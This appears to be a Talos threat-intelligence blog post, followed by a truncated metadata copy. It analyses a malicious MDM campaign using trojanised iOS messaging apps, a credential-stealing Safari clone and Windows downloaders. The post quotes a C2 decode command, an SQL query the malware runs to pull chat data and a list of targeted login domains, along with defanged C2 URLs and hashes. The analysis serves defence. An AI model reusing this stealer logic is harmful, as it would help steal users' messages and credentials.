Advanced Mobile Malware Campaign in India uses Malicious MDM - Part 2

2018-07-24T22:24:00

Description

_This blog post is authored by[ ](<https://twitter.com/securitybeard?lang%3Den>)[Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and[ ](<https://twitter.com/r00tbsd>)[Paul Rascagneres](<https://twitter.com/r00tbsd>) and[ ](<https://twitter.com/SmugYeti>)[Andrew Williams](<https://twitter.com/SmugYeti>)._ ## Summary Since our [initial post](<https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html>) on malicious mobile device management (MDM) platforms, we have gathered more information about this actor that we believe shows it is part of a broader campaign targeting multiple platforms. These new targets include Windows devices and additional backdoored iOS applications. We also believe we have associated this actor with a very similar campaign affecting Android devices. With this additional information, we have been able to build a profile of how the MDM was working, as explained in the previous post, while also allowing us to identify new infrastructure. We feel that it is critical that users are aware of this attack method, as well-funded actors will continue to utilize MDMs to carry out their campaigns. To be infected by this kind of malware, a user needs to enroll their device, which means they should be on the lookout at all times to avoid accidental enrollment. In the new MDM we discovered, the actor changed some of their infrastructure in an attempt to improve the MDM's security posture. We also found additional compromised devices, which were again located in India, with one even using the same phone number linking the MDM platforms, and one located in Qatar. We believe this newer version was used from January to March 2018. Similar to the previous MDM, we were able to identify the IPA files the attacker was using to compromise iOS devices. Additionally, we discovered that malicious apps such as WhatsApp had new malicious methods tacked onto them. During this ongoing analysis, we also looked into other potential indicators that would point us toward the actor. We discovered this [Bellingcat article](<https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/>) that potentially links this actor to one they dubbed "Bahamut," an advanced actor who was previously targeting Android devices. Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post. There was also a separate post from [Amnesty International](<https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852>) discussing a similar actor that used similar spear-phishing techniques to Bahamut. However, Cisco Talos did not find any spear phishing associated with this campaign. We will discuss some links and potential overlapping with these campaigns below. ## New MDM ### Technical information about the MDM Talos identified a third MDM server that we believe was used by this actor: ios-update-whatsapp[.]com. The first relevant difference between this MDM and the MDM we discussed in the previous article is the fact that the attackers patched the open-source project[ ](<https://github.com/project-imas/mdm-server>)[mdm-server](<https://github.com/project-imas/mdm-server>) — a small iOS MDM server. The attackers added an authentication process. In the last version, no authentication was available. Here is the auth page: [![](https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s640/image1.png)](<https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s1600/image1.png>) Additionally, we identified different technical information based on the certificate used. Here is the certificate used by this MDM: CA.crt Serial Number: 17948952500637370160 (0xf9177d33a2d98730) Signature Algorithm: sha256WithRSAEncryption Issuer: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com Validity Not Before: Jan 15 09:47:15 2018 GMT Not After : Jan 15 09:47:15 2019 GMT Subject: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com A fake company, Tech Big, which was allegedly located in Hong Kong, had this certificate issued to it in January 2018. ### Log analysis Three devices were enrolled on this server: * Two devices with an Indian phone number that were also located in India (one of the devices has the same phone number as the believed attacker's device used in the previous post) * One device with a British phone number located in Qatar The logs showed us that the MDM was created in January 2018, and was used from January to March of this year. ## New malicious iOS apps ### Fake Telegram & WhatsApp Talos identified two other malicious Telegram and WhatsApp apps. The attacker built these apps by adding malicious capabilities to existing Telegram and WhatsApp applications. The malicious aspect of the apps is the same as what we described in the previous post. The only difference is the command and control (C2) obfuscation. The URLs are not stored in plaintext, but are encrypted with data encryption standard (DES) and encoded in base64. Here is an example of the encoded URL: [![](https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s640/image3.png)](<https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s1600/image3.png>) And the DES key: [![](https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s640/image4.png)](<https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s1600/image4.png>) Once decoded and decrypted, we can easily read the URL of the C2: ./decode.py vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ== '&%^*#@!$' hxxp://hytechmart[.]com/UcSmCMbYECELdbe/ ### Fake IMO IMO is a chat and video app available on mobile devices. We identified a fake application that pretended to be IMO. The attackers used the same technique to add malicious code to the legitimate application: BOptions sideloading technique. For more information about this technique, we recommend reading the previous blog post. The C2 server has the same obfuscation technique as the fake, malicious Telegram and WhatsApp apps described above. The attacker simply changed the encryption key used. The purpose of the malicious code is similar to the previous malicious apps in that it steals contact information and chat history. This application uses SQLite to store the data. Here is an example of request performed to get the data: * DBManager accesses 'IMODb2.sqlite' * Select ZIMOCHATMSG.Z_PK,ZIMOCHATMSG.ZTEXT,ZIMOCHATMSG.ZISSENT,ZIMOCONTACT.ZPHONE,ZIMOCONTACT.ZBUID AS Contact_ID from ZIMOCONTACT join ZIMOCHATMSG ON (ZIMOCONTACT.ZBUID = ZIMOCHATMSG.ZBUID) where ZIMOCHATMSG.Z_PK >'%d' ### Malicious Safari browser Talos has also discovered a malicious Safari application available on the third malicious MDM. For this application, the attackers did not use the BOptions sideloading technique. It's a malicious browser developed from scratch and based on three open-source projects: [SCSafariPageController](<https://github.com/stefanceriu/SCSafariPageController>), [SCPageViewController ](<https://github.com/stefanceriu/SCPageViewController>)and [SCScrollView](<https://github.com/stefanceriu/SCScrollView>). The purpose of this browser is to steal sensitive information from the infected device. First, the app sends the universally unique identifier (UUID) of the device to the C2 server. Based on the server response, the malicious browser will send additional information, such as the user's contact information (picture, name, email, postal address, etc.), the user's pictures, the browser's cookies and the clipboard. The malware checks for a file named "hib.txt," and if the file doesn't exist on the device, it displays an iTunes login page in an attempt to harvest the user's login credentials. Upon entering the credentials, the email address and password are sent to the C2 server. Additionally, these credentials get written into the file and the user is considered "signed in." The most intriguing part is the credential stealer. If the browsed domain name contains one of the following strings, the malware will automatically exfiltrate the username and the password of the user to the C2 server. Most notably, there is the presence of secure email providers, among a variety of other web services. * Login.yahoo (email platform) * Mail.com (email platform) * Rediff (Indian news portal and email platform with around 95 million registered users) * Amazon (e-commerce platform) * Pinterest (image-sharing and discovery platform) * Reddit (news aggregation web portal with forums) * Accounts.google (Google sign-in platform) * Ask.fm (anonymous decentralised Q&A platform) * Mail.qq (Chinese email platform) * Baidu.com (Chinese search engine and email provider) * Mail.protonmail (secure email provider located in Switzerland) * Gmx (email platform) * AonLine.aon (British assurance) * ZoHo (Indian email service) * Tutanota (secure email provider located in Germany) * Lycos.com (search engine and web portal with email platform) The malware continuously monitors a web page, seeking out the HTML form fields that hold the username and password as the user types them in to steal credentials. The names of the inspected HTML fields are embedded into the app alongside the domain names. Here is a list of the "username" fields that are referenced by the app code: [![](https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s640/image5.png)](<https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s1600/image5.png>) For example, we see m_U, which is the username field in the Lycos mail authentication page: [![](https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s640/image7.png)](<https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s1600/image7.png>) The malware contains a similar list concerning the password field. Finally, the malicious browser contains three malicious plugins: * "Add Bookmark" * "Add To Favourites" * "Add to Reading List" The purpose of the malicious extensions are very similar to the previous ones — it sends off stored data to the same C2 server as the other apps. In the core and the plugins, the C2 server is encoded in base64 and encrypted in AES instead of DES. ## Links with previous campaign The Bahamut group was discovered and detailed by Bellingcat, an open-source news website. In this post, the author was discussing Android-based malware with some similarities to the iOS malware we identified. That post kickstarted our investigation into any potential overlap between these campaigns and how they are potentially linked. The new MDM platform we identified has similar victimology with Middle Eastern targets, namely Qatar, using a U.K. mobile number issued from LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign. We identified an overlap in the domain voguextra[.]com, which was used by Bahamut within their "Devoted To Humanity" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post. Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal [here](<https://www.virustotal.com/%23/url/a65bcd077ea0c098ae0bc88414a38f2cf4333cae40d704eb88dfa043819f70d7/details>) using hxxp://voguextra[.]com/decoy.doc. The domains used during this campaign shared similarities with the domains used throughout the Bahamut campaign reported by Bellingcat. Most of the email addresses used within the domains were [*@mail.ru](<mailto:*@mail.ru>) email accounts, the C2s identified both used AES encrypted strings represented as base64 values, and the URI patterns used in both campaigns shared an almost identical syntax: repository + random.php + GET value /hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string] The domains also had similar structures for the domain name (they are formatted [word]-[word]-[word]) across both campaigns. Actors tend to stick with similar structures, especially if they have had success in the past. Once we started profiling the domains, we quickly noticed a strong link to India. With access to historical whois and hosting information, we were able to determine that the three MDM domains pointed to an Indian nexus. All three domains used a privacy proxy to register their domains. However, what the actor did not do was create nameservers upon registering the domains. This allowed us to discover that two of the three domains were registered with Indian registrars and hosting providers. The three domains identified for MDM use were ios-update-whatsapp[.]com, ios-certificate-update[.]com and www[.]wpitcher[.]com. **ios-update-whatsapp[.]com** The nameserver used initially was obox.dns[.]com, which is owned by the India-based Directi platform, is an Indian registrar and was the original nameservers used by this domain. This later changed to being [ns1-2].ios-update-whatsapp[.]com, which suggests this domain was potentially registered and purchased in India. **wpitcher[.]com** This domain initially used nameservers related to the Indian company MantraGrid, an India-based cloud platform that shows another link to an Indian actor by using this as one of the original MDM domains we identified. **ios-certificate-update.com** This domain used a similar structure to ios-update-whatsapp[.]com and also shared the same privacy proxy as the other two domains listed above relating to the MDM activity. This was one of the first registered domains and was using a bulletproof hosting platform in Panama. Finally, Bellingcat, via Tom Lancaster, identified similarities with a previous InPage campaign reported by [Kaspersky](<https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/>) which shows similar URI structuring, as well as victimology. The InPage attack targeted Urdu-speaking Muslims, which further increases the likelihood that the victims are Indian-based because Urdu is a dialect primarily spoken in India and Pakistan. With our attacker, we identified that the MDM was also taking advantage of an application called PrayTime — a popular app for Muslims that alerts them to complete their daily prayers. With all of this taken into consideration, we assess with moderate confidence that the attacker is located in India. Additionally, we assess with low confidence that the campaign we discovered is linked to the Bahamut group. ## Links with Windows-targeted campaigns Talos identified several malicious binaries that could be used to target victims running Microsoft Windows operating systems using the same infrastructure as the malicious app mentioned in our previous article, techwach.com. The sample 6b62f4db64edf7edd648c38a563f44b656b0f6ad9a0e4e97f93cf9abfdfc63e5 contacts the following URL to download an additional payload from the following page: * hxxp://techwach[.]com/Beastwithtwobacks/Barkingupthewrongtree.php We know that the MDM and the Windows services were up and running on the same C2 server in May 2018. The purpose of this malicious Windows binary is to get information on the infected device (username and hostname), send this information and retrieve an additional PE32 file if the operator estimates that the targeted system is relevant. We found additional similar samples between June 2017 and June 2018 with different C2 servers. The attackers have two kinds of samples: one developed in Delphi and one developed in VisualBasic. Here are the Delphi samples: * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 -> hxxp://appswonder[.]info * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 -> hxxp://referfile[.]com * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed -> hxxp://hiltrox[.]com * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b -> hxxp://scrollayer[.]com * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 -> hxxp://twitck[.]com * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 -> hxxp://scrollayer[.]com Here are the VisualBasic samples: * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d -> hxxp://32player[.]com * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 -> hxxp://nfinx[.]info * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea -> hxxp://metclix[.]com/ * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 -> hxxp://appswonder[.]info/ ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 -> hxxp://capsnit[.]com/ Some of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matched the Apache setup of the malicious IPA apps. Additionally, we identified the infection vector of one of the Windows malware. The attackers used a malicious RTF (a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4) abusing the CVE-2018-0802 vulnerability in order to drop and execute the last binary of the previously mentioned list. Finally, one of the VisualBasic binary was bundled in a msiexec file with this following decoy document: [![](https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s640/image2.png)](<https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s1600/image2.png>) This decoy document is using a news story image found on the India Today newspaper website [here](<https://www.indiatoday.in/india/manipur/story/naga-peace-accord-nscn-im-muivah-greater-nagalim-967260-2017-03-23>), which is describing the Naga peace accord. The Indian targets in this campaign are likely very interested in this topic. ## Conclusion Since researching our original blog post, we have discovered that an actor has been operating these malicious MDMs for many years. Based on previous research regarding the Bahamut group and our research, we believe the observed infrastructure is not limited to iOS targets, but is part of a broader framework that supports Apple iOS and Windows platforms. This actor is likely located in India, given what we see in the technical elements. While the attacker's infrastructure throughout the entirety of the operation seems very similar to the one used by the Bahamut group, and they may even be connected, it is not possible to assert with high confidence that it is Bahamut at this time. The use of a malicious MDM is convenient and the system is well-documented. Given the effectiveness of MDM abuse, it's likely that well-funded actors will continue to move into this area. Because enrollment into the MDM requires user interaction and acceptance, it is crucial that they are aware of this type of threat and the dangers it can pose to their data and privacy. Talos will continue to keep an eye on MDM and similar infrastructures to ensure we are reporting the latest information and forcing the bad guys to innovate. ## Coverage Additional ways our customers can detect and block this threat are listed below. [![](https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s320/image6.png)](<https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s1600/image6.png>) Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. [Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. Network Security appliances such as[ Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. [AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection for all Cisco Security products. [Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on[ ](<https://www.snort.org/products>)[Snort.org](<https://www.snort.org/products>). ## IOCs iOS Applications * 422e4857614cc603f2388eb9a6b7bbe16d45b9fd0a9b752f02c107887cf8cb3e imo.ipa * e3ceec8676e2a1779b8289e341874209a448b11f3d81834a2faae9c494267602 Safari.ipa * bab7f61ed0f2b085c02ff1e4305ceab4479455d7b4cfba0a018b73ee955fcb51 Telegram.ipa * fbfaed75aa855c7db486edee15359b9f8c1b394b0b02f77b22500a90c53cb423 WhatsApp.ipa MDM Domain: * ios-update-whatsapp[.]com C2 Domains: * hytechmart[.]com PE32 Samples: * b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 * 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 * 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed * e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b * e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 * e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 * 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d * ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 * d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea * d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 * ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 PE32 C2 servers: * hxxp://appswonder[.]info * hxxp://referfile[.]com * hxxp://hiltrox[.]com * hxxp://scrollayer[.]com * hxxp://twitck[.]com * hxxp://scrollayer[.]com * hxxp://32player[.]com * hxxp://nfinx[.]info * hxxp://metclix[.]com/ * hxxp://capsnit[.]com/ Malicious RTF Samples: * a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4 ![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/-9jjaXrJwBo)

{"id": "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "type": "talosblog", "bulletinFamily": "blog", "title": "Advanced Mobile Malware Campaign in India uses Malicious MDM - Part 2", "description": "_This blog post is authored by[ ](<https://twitter.com/securitybeard?lang%3Den>)[Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and[ ](<https://twitter.com/r00tbsd>)[Paul Rascagneres](<https://twitter.com/r00tbsd>) and[ ](<https://twitter.com/SmugYeti>)[Andrew Williams](<https://twitter.com/SmugYeti>)._ \n \n\n\n## Summary\n\n \nSince our [initial post](<https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html>) on malicious mobile device management (MDM) platforms, we have gathered more information about this actor that we believe shows it is part of a broader campaign targeting multiple platforms. These new targets include Windows devices and additional backdoored iOS applications. We also believe we have associated this actor with a very similar campaign affecting Android devices. \n \nWith this additional information, we have been able to build a profile of how the MDM was working, as explained in the previous post, while also allowing us to identify new infrastructure. We feel that it is critical that users are aware of this attack method, as well-funded actors will continue to utilize MDMs to carry out their campaigns. To be infected by this kind of malware, a user needs to enroll their device, which means they should be on the lookout at all times to avoid accidental enrollment. \n \nIn the new MDM we discovered, the actor changed some of their infrastructure in an attempt to improve the MDM's security posture. We also found additional compromised devices, which were again located in India, with one even using the same phone number linking the MDM platforms, and one located in Qatar. We believe this newer version was used from January to March 2018. Similar to the previous MDM, we were able to identify the IPA files the attacker was using to compromise iOS devices. Additionally, we discovered that malicious apps such as WhatsApp had new malicious methods tacked onto them. \n \nDuring this ongoing analysis, we also looked into other potential indicators that would point us toward the actor. We discovered this [Bellingcat article](<https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/>) that potentially links this actor to one they dubbed \"Bahamut,\" an advanced actor who was previously targeting Android devices. Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post. There was also a separate post from [Amnesty International](<https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852>) discussing a similar actor that used similar spear-phishing techniques to Bahamut. However, Cisco Talos did not find any spear phishing associated with this campaign. We will discuss some links and potential overlapping with these campaigns below. \n \n \n \n\n\n## New MDM\n\n \n\n\n### Technical information about the MDM\n\n \nTalos identified a third MDM server that we believe was used by this actor: ios-update-whatsapp[.]com. \n \nThe first relevant difference between this MDM and the MDM we discussed in the previous article is the fact that the attackers patched the open-source project[ ](<https://github.com/project-imas/mdm-server>)[mdm-server](<https://github.com/project-imas/mdm-server>) \u2014 a small iOS MDM server. The attackers added an authentication process. In the last version, no authentication was available. Here is the auth page: \n\n\n[![](https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s640/image1.png)](<https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s1600/image1.png>)\n\n \nAdditionally, we identified different technical information based on the certificate used. Here is the certificate used by this MDM: \n \nCA.crt \n\n \n \n Serial Number: 17948952500637370160 (0xf9177d33a2d98730) \n Signature Algorithm: sha256WithRSAEncryption \n Issuer: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n Validity \n Not Before: Jan 15 09:47:15 2018 GMT \n Not After : Jan 15 09:47:15 2019 GMT \n Subject: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n \n\nA fake company, Tech Big, which was allegedly located in Hong Kong, had this certificate issued to it in January 2018. \n\n\n### Log analysis\n\n \nThree devices were enrolled on this server: \n \n\n\n * Two devices with an Indian phone number that were also located in India (one of the devices has the same phone number as the believed attacker's device used in the previous post)\n * One device with a British phone number located in Qatar\n \nThe logs showed us that the MDM was created in January 2018, and was used from January to March of this year. \n \n\n\n## New malicious iOS apps\n\n \n\n\n### Fake Telegram & WhatsApp\n\n \nTalos identified two other malicious Telegram and WhatsApp apps. The attacker built these apps by adding malicious capabilities to existing Telegram and WhatsApp applications. The malicious aspect of the apps is the same as what we described in the previous post. The only difference is the command and control (C2) obfuscation. The URLs are not stored in plaintext, but are encrypted with data encryption standard (DES) and encoded in base64. \n \nHere is an example of the encoded URL: \n\n\n[![](https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s640/image3.png)](<https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s1600/image3.png>)\n\n \nAnd the DES key: \n\n\n[![](https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s640/image4.png)](<https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s1600/image4.png>)\n\n \nOnce decoded and decrypted, we can easily read the URL of the C2: \n\n \n \n ./decode.py vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ== '&%^*#@!$' \n hxxp://hytechmart[.]com/UcSmCMbYECELdbe/ \n \n\n### Fake IMO\n\n \nIMO is a chat and video app available on mobile devices. We identified a fake application that pretended to be IMO. The attackers used the same technique to add malicious code to the legitimate application: BOptions sideloading technique. For more information about this technique, we recommend reading the previous blog post. \n \nThe C2 server has the same obfuscation technique as the fake, malicious Telegram and WhatsApp apps described above. The attacker simply changed the encryption key used. The purpose of the malicious code is similar to the previous malicious apps in that it steals contact information and chat history. This application uses SQLite to store the data. Here is an example of request performed to get the data: \n \n\n\n * DBManager accesses 'IMODb2.sqlite'\n * Select ZIMOCHATMSG.Z_PK,ZIMOCHATMSG.ZTEXT,ZIMOCHATMSG.ZISSENT,ZIMOCONTACT.ZPHONE,ZIMOCONTACT.ZBUID AS Contact_ID from ZIMOCONTACT join ZIMOCHATMSG ON (ZIMOCONTACT.ZBUID = ZIMOCHATMSG.ZBUID) where ZIMOCHATMSG.Z_PK >'%d'\n\n### Malicious Safari browser\n\n \nTalos has also discovered a malicious Safari application available on the third malicious MDM. For this application, the attackers did not use the BOptions sideloading technique. It's a malicious browser developed from scratch and based on three open-source projects: [SCSafariPageController](<https://github.com/stefanceriu/SCSafariPageController>), [SCPageViewController ](<https://github.com/stefanceriu/SCPageViewController>)and [SCScrollView](<https://github.com/stefanceriu/SCScrollView>). \n \nThe purpose of this browser is to steal sensitive information from the infected device. First, the app sends the universally unique identifier (UUID) of the device to the C2 server. Based on the server response, the malicious browser will send additional information, such as the user's contact information (picture, name, email, postal address, etc.), the user's pictures, the browser's cookies and the clipboard. \n \nThe malware checks for a file named \"hib.txt,\" and if the file doesn't exist on the device, it displays an iTunes login page in an attempt to harvest the user's login credentials. Upon entering the credentials, the email address and password are sent to the C2 server. Additionally, these credentials get written into the file and the user is considered \"signed in.\" \n \nThe most intriguing part is the credential stealer. If the browsed domain name contains one of the following strings, the malware will automatically exfiltrate the username and the password of the user to the C2 server. Most notably, there is the presence of secure email providers, among a variety of other web services. \n \n\n\n * Login.yahoo (email platform)\n * Mail.com (email platform)\n * Rediff (Indian news portal and email platform with around 95 million registered users)\n * Amazon (e-commerce platform)\n * Pinterest (image-sharing and discovery platform)\n * Reddit (news aggregation web portal with forums)\n * Accounts.google (Google sign-in platform)\n * Ask.fm (anonymous decentralised Q&A platform)\n * Mail.qq (Chinese email platform)\n * Baidu.com (Chinese search engine and email provider)\n * Mail.protonmail (secure email provider located in Switzerland)\n * Gmx (email platform)\n * AonLine.aon (British assurance)\n * ZoHo (Indian email service)\n * Tutanota (secure email provider located in Germany)\n * Lycos.com (search engine and web portal with email platform)\n \nThe malware continuously monitors a web page, seeking out the HTML form fields that hold the username and password as the user types them in to steal credentials. The names of the inspected HTML fields are embedded into the app alongside the domain names. Here is a list of the \"username\" fields that are referenced by the app code: \n\n\n[![](https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s640/image5.png)](<https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s1600/image5.png>)\n\nFor example, we see m_U, which is the username field in the Lycos mail authentication page: \n\n\n[![](https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s640/image7.png)](<https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s1600/image7.png>)\n\n \nThe malware contains a similar list concerning the password field. \n \nFinally, the malicious browser contains three malicious plugins: \n\n\n * \"Add Bookmark\"\n * \"Add To Favourites\"\n * \"Add to Reading List\"\nThe purpose of the malicious extensions are very similar to the previous ones \u2014 it sends off stored data to the same C2 server as the other apps. \n \nIn the core and the plugins, the C2 server is encoded in base64 and encrypted in AES instead of DES. \n \n\n\n## Links with previous campaign\n\n \nThe Bahamut group was discovered and detailed by Bellingcat, an open-source news website. In this post, the author was discussing Android-based malware with some similarities to the iOS malware we identified. That post kickstarted our investigation into any potential overlap between these campaigns and how they are potentially linked. \n \nThe new MDM platform we identified has similar victimology with Middle Eastern targets, namely Qatar, using a U.K. mobile number issued from LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign. \n \nWe identified an overlap in the domain voguextra[.]com, which was used by Bahamut within their \"Devoted To Humanity\" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post. Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal 